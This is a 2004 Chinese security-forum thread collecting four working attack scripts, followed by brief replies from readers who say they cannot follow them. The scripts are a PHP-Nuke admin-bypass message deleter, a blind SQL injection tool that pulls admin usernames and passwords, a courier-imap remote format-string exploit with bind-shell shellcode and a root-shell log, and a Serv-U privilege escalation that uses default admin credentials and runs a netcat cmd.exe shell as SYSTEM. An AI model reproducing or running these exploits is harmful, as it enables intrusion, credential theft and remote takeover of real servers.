Board logo

标题: 几个攻击脚本集合 [打印本页]
作者: 路还长    时间: 2004-9-27 14:30     标题: 几个攻击脚本集合

PHP-Nuke 7.4 SQL Injection Exploit [XSS]/SQL Injection PHP-Nuke Delete Message(s) Bug by bima_ Php-Nuke is a popular freeware content management system. Based on information at : http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+PHP-Nuke+7.4+Add+Message+Bug<;;/a> An attacker permitted to post to global home-page messages. I found that we can delete message(s) too. I wrote a little perl script to prove it, i used POST method. Here it is : ******cut here************** #!/usr/bin/perl # use LWP; $log = "pos_phpnuke_deletemsg.txt"; $Agent = "Mbahmu/1.0"; $proxy = "http://172.9.1.11:80/<;;/a>"; # proxy:port ... $browser = LWP::UserAgent->new; $browser -> agent($Agent); $url = 'http://www.sitewithphpnuke.com/admin.php<;;/a>'; $browser->proxy(http => $proxy) if defined($proxy); printlog ("\nProcessing: $url\n"); for ($a = 1; $a < 11; $a++) { $mid=$a; $loginpost = $url; $loginrequest = HTTP::Request->new(POST => $loginpost); $loginrequest->content_type('application/x-www-form-urlencoded'); $loginsend = 'mid='.$mid. '&ok=1'. '&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. '&add_radminsuper=1'. '&op=deletemsg'; $loginrequest->content-length($loginsend); $loginrequest->content($loginsend); $loginresponse = $browser->request($loginrequest); $logincek = $loginresponse->as_string; #print ($logincek); if ($logincek =~ /(500 Can\'t read entity body\: Unknown error)|(411 Length Required)/){ printlog ("$mid attempting delete message sending OK ".$loginresponse->status_line ."\n"); } else { printlog ("$mid could be failure ".$loginresponse->status_line ."\n"); last; } } #end of for sub printlog { print @_[0]; open(lo,">>$log"); print lo @_[0]; close(lo); return; } ******cut here************** ---------------------------------------------------------- *very very very special greetz to: [+][+][+] my beloved anna [+][+][+] *shout to dhanny firman syah : keep fighting, bro... *special greetz to: [+] www.neoteker.or.id [+] www.echo.or.id [+] www.bosen.net [+] qq [+] tiyox [+] bosen [+] ftp_geo [+] tiong [+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net [+] all #1stlink #romance #hackers @ centrin [+] sj, alphacentupret, boeboe, fuzk3 kendi [+] y3d1ps, z3r0byt3, biatch-x, K-159 *contact: [+] iko94@yahoo.com [+] www.geocities.com/iko94 [+] www.neoteker.or.id [EOF]
作者: 路还长    时间: 2004-9-27 14:31     标题: 几个攻击脚本集合

惊云下载系统漏洞利用Exploits #!/usr/bin/perl #The s cript Crack admin for SQL 注入 #Code by xiaolu use IO::Socket; $ARGC = @ARGV; if ($ARGC < 3) { print "\n\n"; print "\t* The script write by Xiaolu *\n\n"; print "例子: jy.pl 666w.com /down/admin/edit.asp 80\n"; exit; } $host = @ARGV[0]; $way = @ARGV[1]; $port = @ARGV[2]; $errinfo="原密码错误"; print "\n\n开始在 $host 上进行测试,请等待......\n"; for ($userlen=1;$userlen<=20;$userlen++) { $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(user)%3D$userlen%09and%09'1%3D1"; &url;@res = &connect; #print "\n @res \n"; if ("@res" =~ /$errinfo/) { print "* 发现user长度为: $userlen 位\n"; last; } } for ($pwdlen=1;$pwdlen<=20;$pwdlen++) { $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(pwd)%3D$pwdlen%09and%09'1%3D1"; &url;@res = &connect; #print "\n @res \n"; if ("@res" =~ /$errinfo/) { print "* 发现pwd长度为: $pwdlen 位\n"; last; } } @dig=(0..9); @char=(a..z); @dchar=(A..Z); @tchar=qw(` ~ ! + @ # $ %25 ^ & * \( \) _ = - { } [ ] : ; < > ? | , . / \\); @dic=(@char,@dig,@tchar); @dic1=(@dig,@char,@tchar,@dchar); print "\n开始尝试获取user,请等待......\n"; for ($userlocat=1;$userlocat<=$userlen;$userlocat++) { foreach $usertemp(@dic) { $user=$userdic.$usertemp; $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(user,$userlocat)%3D'$user'%09and%09'1%3D1"; #print "$usertemp "; &url;@res = &connect; if ("@res" =~ /$errinfo/) { $userdic=$user; if ($userlocat==$userlen){print "\n\n* user获取成功!!! : $user \n";last;} print "* user共 $userlen 位,前 $userlocat 位为 $user \n"; last; } } } print "\n开始尝试获取pwd,请等待......\n"; for ($pwdlocat=1;$pwdlocat<=$pwdlen;$pwdlocat++) { foreach $pwdtemp(@dic1) { $pwd=$pwddic.$pwdtemp; $way1 = "wocaonima'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(pwd,$pwdlocat)%3D'$pwd'%09and%09'1%3D1"; #print "$pwdtemp "; &url;@res = &connect; if ("@res" =~ /$errinfo/) { $pwddic=$pwd; if ($pwdlocat==$pwdlen){print "\n\n* pwd获取成功!!! : $pwd \n";last;} print "* pwd共 $pwdlen 位,前 $pwdlocat 位为 $pwd \n"; last; } } } sub url { $req = "POST $way HTTP/1.1\r\n". "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n". "Referer: http://$host$way<;/a>\r\n". "Accept-Language: zh-cn\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n". "Host: $host\r\n". "Content-Length: 164\r\n". "Connection: Keep-Alive\r\n". "Cache-Control: no-cache\r\n". "Cookie: ASPSESSIONIDCQDSRBCC=PNKEJFPDCHNPPHOCJICEPCHP; JyDownUserDj=3; JyDownUserName=$way1\r\n". "\r\n". "type=save&pwd=1&pwd1=&pwd2=&sex=%C4%D0&face=&oicq=&email=&homepage=&qm=%BB%B6%D3%AD%C4%E3%C0%B4%B5%BD%BB%AA%CC%DA%C1%AA%BA%CF.&softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4\r\n\r\n"; } sub connect { my $connection = IO::Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $connection $req; my @res = <$connection>; close $connection; return @res; }
作者: 路还长    时间: 2004-9-27 14:32     标题: 几个攻击脚本集合

courier-imap down 3.0.2-r1 Remote Format String exp /* courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit Author: ktha at hush dot com Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2 Special thanks goes to andrewg for providing the FreeBSD box. Greetings: all the guys from irc pulltheplug com and irc netric org bash-2.05b$ ./sm00ny-courier_imap_fsx courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com Launching attack against 127.0.0.1:143 [+] Got current ebp(5100): 0xbfbfb050 [+] Got possible saved ebp(3281): 0xbfbfe390 [+] Got possible write on the stack pointer(3293): 0xbfbfe3c0 [+] Verifying...failed [+] Got possible saved ebp(3286): 0xbfbfe3a4 [+] Got possible write on the stack pointer(3298): 0xbfbfe3d4 [+] Verifying...failed [+] Got possible saved ebp(3287): 0xbfbfe3a8 [+] Got possible write on the stack pointer(3299): 0xbfbfe3d8 [+] Verifying...OK [+] Building fmt...done [+] Building shellcode...done Using ret: 0x8057000 Using got of fprintf(): 0x804fefc Checking for shell.. uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) N.B. 1. ret can be guessed ;) 2. got, well.. that's a different story, it must be bruteforced 3. "ce_number" & "se_number" can be set with some default values when running multiple times 4. shell is usable for aprox 1 min [ Need a challenge ? ] [ Visit http://www.pulltheplug.com<;;/a> ] */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define BIGBUF 2048 #define IMAP_PORT 143 #define END_BRUTEFORCE_STACK 5500 #define TOP_STACK 0xbfc00000 /* FreeBSD */ #define START_BRUTEFORCE_SAVED_EBP 3000 #define JUNK 9 #define GAP_EBP_ESP 48 #define DUMMY_NUMBER 100 void die(int type, char *message) { if(type == 2) perror(message); else fprintf(stderr,"%sn",message); exit(1); } int connect_to (char *host, int port){ struct hostent *h; struct sockaddr_in c; int sock; if ((host == NULL) || (*host == (char) 0)) die(1, "[-] Invalid hostname"); if ((c.sin_addr.s_addr = inet_addr (host)) == -1){ if ((h = gethostbyname (host)) == NULL) die(1, "[-] Cannot resolve host"); memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr)); } if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) die(2,"[-] Error creating socket:"); c.sin_family = PF_INET; c.sin_port = htons (port); if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1) die(2, "[-] Cannot connect: "); return sock; } void close_socket (int sock){ shutdown (sock, 2); close (sock); } char *get_request(char *username, char *password){ char *request = (char *)malloc(strlen(username)+strlen(password)+20); sprintf(request,"1 LOGIN "%s" "%s"rn",username, password); return request; } void send_data(int sock, char *request){ int n; n = send (sock, request, strlen (request), 0); if (n != strlen (request)){ close_socket (sock); die(1, "Error sending requestn"); } } int get_ce_number(char *host, int port){ int sock; int loop; char temp[BIGBUF]; int l,n; char username[BIGBUF]; char password[BIGBUF]; char *request; for (loop = END_BRUTEFORCE_STACK;;loop--){ sock = connect_to(host, port); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%d$p",loop); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n > 0) break; } return loop; } int get_se_number(int start, int end, char *host, int port){ int loop; char username[BIGBUF]; char password[BIGBUF]; char *request; int l,n; char temp[BIGBUF]; int sock; if (!start) start = START_BRUTEFORCE_SAVED_EBP; for (loop = start; loop < end; loop++){ sock = connect_to(host, port); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%d$n",loop); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n > 0) break; } if (loop == end) return -1; return loop; } int verify_se_number(int write, unsigned long addy, int number, char *host, int port){ char username[BIGBUF]; char password[BIGBUF]; char temp[BIGBUF]; char *request; int n, sock; sock = connect_to(host, port); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n <= 0) return 0; sock = connect_to(host, port); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); sprintf(password,"sm00ny"); sprintf(username,"%%%u$n%%%u$hn", number, write); request = get_request(username,password); send_data(sock,request); memset(temp,0,sizeof(temp)); n = recv (sock, temp, sizeof (temp), 0); close_socket (sock); if (n > 0) return 0; return 1; } int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){ int i,j,sum,byte; int *vec = (int *)malloc(11 * sizeof(int)); sum = JUNK; for (i=0; i<2; i++){ for (j=0; j<2; j++){ vec[2*(2 * i + j)] = (got_addy & 0xffff) - sum; while (vec[2*(2 * i + j)] <= 12) vec[2*(2 * i + j)] += 0x10000; sum += vec[2*(2 * i + j)]; byte = ((got + 2 * i) >> (16*j)) & 0xffff; vec[2*(2 * i + j) + 1] = byte - sum; while (vec[2*(2 * i + j) + 1] <= 12) vec[2*(2 * i + j) + 1] += 0x10000; sum += vec[2*(2 * i + j) + 1]; got_addy += 2; } } for (i=0; i<2; i++){ byte = (ret >> (16*i)) & 0xffff; vec[8+i] = byte - sum; while (vec[8+i] <= 12) vec[8+i] += 0x10000; sum += vec[8+i]; } return vec; } char *get_format_string(int *vec, int se_number, int write_number, int got_number){ char *buf = (char *) malloc(BIGBUF); char smallbuf[256]; int i; for (i=0; i<4; i++){ sprintf(smallbuf ,"%%%uu%%%u$hn%%%uu%%%u$hn",vec[2*i],se_number,vec[2*i+1],write_number); strcat(buf,smallbuf); } for (i=0; i<2; i++){ sprintf(smallbuf,"%%%uu%%%u$hn",vec[8 + i],got_number + i); strcat(buf,smallbuf); } return buf; } char *gen_shellcode (int gap){ int size; char *p; char shellcode[] = /* Thanks ilja */ "x31xc0x31xc9x31xd2xb0x61" "x51xb1x06x51xb1x01x51xb1" "x02x51x8dx0cx24x51xcdx80" "xb1x02x31xc9x51x51x51x80" "xc1x77x66x51xb5x02x66x51" "x8dx0cx24xb2x10x52x51x50" "x8dx0cx24x51x89xc2x31xc0" "xb0x68xcdx80xb3x01x53x52" "x8dx0cx24x51x31xc0xb0x6a" "xcdx80x31xc0x50x50x52x8d" "x0cx24x51x31xc9xb0x1excd" "x80x89xc3x53x51x31xc0xb0" "x5axcdx80x41x53x51x31xc0" "xb0x5axcdx80x41x53x51x31" "xc0xb0x5axcdx80x31xdbx53" "x68x6ex2fx73x68x68x2fx2f" "x62x69x89xe3x31xc0x50x54" "x53x50xb0x3bxcdx80x31xc0" "xb0x01xcdx80"; size = strlen (shellcode); p = (char *) malloc (gap + 1); /* Some nops ;) */ memset (p, 0x41, gap); memcpy (p + gap - size, shellcode, size + 1); return p; } void root(char *host) { fd_set rfds; int n; int sock; char buff[1024]; sock = connect_to(host,30464); send(sock,"id;n",4,0); while(1) { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); if(select(sock+1, &rfds, NULL, NULL, NULL) < 1) exit(0); if(FD_ISSET(0,&rfds)) { if( (n = read(0,buff,sizeof(buff))) < 1) exit(0); if( send(sock,buff,n,0) != n) exit(0); } if(FD_ISSET(sock,&rfds)) { if( (n = recv(sock,buff,sizeof(buff),0)) < 1) exit(0); write(1,buff,n); } } } main (int argc, char **argv) { char *host="127.0.0.1"; int port = IMAP_PORT; int sock; char *temp1, *temp2; char *request; int *vec; int n,ok,i; unsigned long cur_ebp; // was 5100 on my box int ce_number = 0; unsigned long saved_ebp; // was 3287 on my box int se_number = 0; unsigned long write_addy; int write_number = 0; unsigned long got_addy; int got_number = 0; /* objdump -R /usr/lib/courier-imap/sbin/imaplogin | grep fprintf */ unsigned long got = 0x0804fefc; /* heh.. it's up to you to find this one :P Just use your favourite mathod */ unsigned long ret = 0x8057000; if (argc > 1) host = argv[1]; printf("courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot comn"); printf(" Launching attack against %s:%dn",host,port); if (ce_number == 0) ce_number = get_ce_number(host,port); cur_ebp = TOP_STACK - 4 * ce_number; got_number = DUMMY_NUMBER; got_addy = cur_ebp + 4 * (got_number - 1); printf("[+] Got current ebp(%d): %pn",ce_number,cur_ebp); do{ se_number = get_se_number(se_number,ce_number,host,port); if (se_number == -1) die(1,"[-] Failed to get a saved_ebp !"); saved_ebp = cur_ebp + 4 * (se_number - 1); printf("[+] Got possible saved ebp(%d): %pn",se_number,saved_ebp); write_addy = GAP_EBP_ESP + saved_ebp; write_number = (write_addy - cur_ebp) / 4 + 1; printf("[+] Got possible write on the stack pointer(%d): %pn",write_number,write_addy); printf("[+] Verifying..."); ok = verify_se_number(write_number,got_addy,se_number,host,port); if (ok) printf("OKn"); else { printf("failedn"); se_number++; } }while (!ok); printf("[+] Building fmt..."); vec = get_format_vector(got_addy,got,ret); temp1 = get_format_string(vec,se_number,write_number,got_number); printf("donen"); printf("[+] Building shellcode..."); temp2 = gen_shellcode(800); printf("donen"); printf(" Using ret: %pn",ret); printf(" Using got of fprintf(): %pn",got); request = get_request(temp1,temp2); sock = connect_to(host, port); send_data(sock,request); sleep(2); close_socket (sock); printf(" Checking for shell..n"); root(host); }
作者: 路还长    时间: 2004-9-27 14:34     标题: 几个攻击脚本集合

Serv-U FTP Default Admin Account Vulnerability /* * Hax0rcitos proudly presents * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0) * * All Serv-u Versions have default Login/password for local Administration. * This account is only available to connect in the loopback interface, so a * local user will be able to connect to Serv-u with this account and create * an ftp user with execute rights. after the user is created, just connect * to the ftp server and execute a raw "SITE EXEC" command. the program will * be execute with SYSTEM privileges. * * Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * * * Date: 10/2003 * Author: Andr閟 Tarasc? Acunha * * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =) * * Tested Against Serv-u 4.x and v5.1.0.0 G:\exploit\serv-U\local>whoami INSANE\aT4r G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe" Serv-u >3.x Local Exploit by Haxorcitos <220 Serv-U FTP Server v5.0 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #l@$ak#.lk;0@P <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [+] Creating New Domain... <200-DomainID=3 220 Domain settings saved ****************************************************** [+] Domain Haxorcitos:3 Created [+] Setting New Domain Online <220 Server command OK ****************************************************** [+] Creating Evil User <200-User=haxorcitos 200 User settings saved ****************************************************** [+] Now Exploiting... >USER haxorcitos <331 User name okay, need password. ****************************************************** >PASS whitex0r <230 User logged in, proceed. ****************************************************** [+] Now Executing: nc -l -p 99 -e cmd.exe <220 Domain deleted ****************************************************** G:\exploit\serv-U\local>nc localhost 99 Microsoft Windows XP [Versi髇 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\>whoami whoami NT AUTHORITY\SYSTEM C:\> */ #include #include #include #include #include //Responses #define BANNER "220 " #define USEROK "331 User name okay" #define PASSOK "230 User logged in, proceed." #define ADMOK "230-Switching to SYSTEM MAINTENANCE mode." #define DOMAINID "200-DomainID=" //Commands #define XPLUSER "USER haxorcitos\r\n" #define XPLPASSWORD "PASS whitex0r\r\n" #define USER "USER LocalAdministrator\r\n" #define PASSWORD "PASS #l@$ak#.lk;0@P\r\n" #define MAINTENANCE "SITE MAINTENANCE\r\n" #define EXIT "QUIT\r\n" char newdomain[]="-SETDOMAIN\r\n" "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n" "-TZOEnable=0\r\n" " TZOKey=\r\n"; /* "-DynDNSEnable=0\r\n" " DynIPName=\r\n"; */ char deldomain[]="-DELETEDOMAIN\r\n" "-IP=0.0.0.0\r\n" " PortNo=2121\r\n"; char newuser[] = "-SETUSERSETUP\r\n" "-IP=0.0.0.0\r\n" "-PortNo=2121\r\n" "-User=haxorcitos\r\n" "-Password=whitex0r\r\n" "-HomeDir=c:\\\r\n" "-LoginMesFile=\r\n" "-Disable=0\r\n" "-RelPaths=1\r\n" "-NeedSecure=0\r\n" "-HideHidden=0\r\n" "-AlwaysAllowLogin=0\r\n" "-ChangePassword=0\r\n" "-QuotaEnable=0\r\n" "-MaxUsersLoginPerIP=-1\r\n" "-SpeedLimitUp=0\r\n" "-SpeedLimitDown=0\r\n" "-MaxNrUsers=-1\r\n" "-IdleTimeOut=600\r\n" "-SessionTimeOut=-1\r\n" "-Expire=0\r\n" "-RatioUp=1\r\n" "-RatioDown=1\r\n" "-RatiosCredit=0\r\n" "-QuotaCurrent=0\r\n" "-QuotaMaximum=0\r\n" "-Maintenance=None\r\n" "-PasswordType=Regular\r\n" "-Ratios=None\r\n" " Access=c:\\|RELP\r\n"; #define localport 43958 #define localip "127.0.0.1" char cadena[1024]; int rec,domain; /******************************************************************************/ void ParseCommands(int sock, char *data, int ShowSend, int showResponses, char *response) { send(sock,data,strlen(data),0); if (ShowSend) printf(">%s",data); Sleep(100); do { rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; if (rec<=0) return; if (showResponses) printf("<%s",cadena); if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0) domain=atoi(cadena+strlen(DOMAINID)); //} while (strncmp(cadena,response,strlen(response))!=0); } while (strstr(cadena,response)==NULL); printf("******************************************************\r\n"); } /******************************************************************************/ int main(int argc, char* argv[]) { WSADATA ws; int sock,sock2; struct sockaddr_in haxorcitos; struct sockaddr_in xpl; printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n"); if (argc<2) { printf("USAGE: ServuLocal.exe \"command\"\r\n"); printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\""); return(0); } if (WSAStartup( MAKEWORD(2,2), &ws )!=0) { printf(" [-] WSAStartup() error\n"); exit(0); } haxorcitos.sin_family = AF_INET; haxorcitos.sin_port = htons(localport); haxorcitos.sin_addr.s_addr = inet_addr(localip); sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)); rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0'; printf("<%s",cadena); ParseCommands(sock,USER,1,1,USEROK); ParseCommands(sock,PASSWORD,1,1,PASSOK); ParseCommands(sock,MAINTENANCE,1,0,"230 "); printf("[+] Creating New Domain...\r\n"); ParseCommands(sock,newdomain,0,1,BANNER); printf("[+] Domain Haxorcitos:%i Created\n",domain); /* Only for v5.x printf("[+] Setting New Domain Online\r\n"); sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n Command=DomainOnline\r\n",domain); ParseCommands(sock,cadena,0,1,BANNER); */ printf("[+] Creating Evil User\r\n"); ParseCommands(sock,newuser,0,1,"200 "); Sleep(1000); printf("[+] Now Exploiting...\r\n"); xpl.sin_family = AF_INET; xpl.sin_port = htons(2121); xpl.sin_addr.s_addr = inet_addr(localip); sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl)); rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0'; ParseCommands(sock2,XPLUSER,1,1,USEROK); ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK); printf("[+] Now Executing: %s\r\n",argv[1]); sprintf(cadena,"site exec %s\r\n",argv[1]); send(sock2,cadena,strlen(cadena),0); shutdown(sock2,SD_BOTH); Sleep(100); ParseCommands(sock,deldomain,0,1,BANNER); send(sock,EXIT,strlen(EXIT),0); shutdown(sock,SD_BOTH); closesocket(sock); closesocket(sock2); return 0; }
作者: 墓志铭    时间: 2004-9-27 21:16     标题: 几个攻击脚本集合

有些看不懂了,知识不够用了。
想问一下,?

还有一个很蠢的问题,PHP是干什么用的。总看到PHP写的代码,但却不知道PHP主要是干什么用的。………………郁闷,
作者: 路还长    时间: 2004-9-28 10:44     标题: 几个攻击脚本集合

键盘,
作者: 路还长    时间: 2004-9-28 10:44     标题: 几个攻击脚本集合

八十八
作者: 路还长    时间: 2004-9-28 10:47     标题: 几个攻击脚本集合

分时,,,,,,
作者: skyxhc    时间: 2004-9-29 11:56     标题: 几个攻击脚本集合

?????
作者: x86    时间: 2004-10-3 14:14     标题: 几个攻击脚本集合

what?
作者: 我是中国人    时间: 2004-10-4 10:48     标题: 几个攻击脚本集合

???不懂
作者: 酷海狂龙    时间: 2004-10-4 21:16     标题: 几个攻击脚本集合

可惜,偶看不懂,谁能详细解析一下啊!!
作者: lovehua115    时间: 2004-10-5 04:17     标题: 几个攻击脚本集合

恩,看不懂拉
作者: bridge8502    时间: 2004-11-27 03:11     标题: 几个攻击脚本集合

不懂



欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2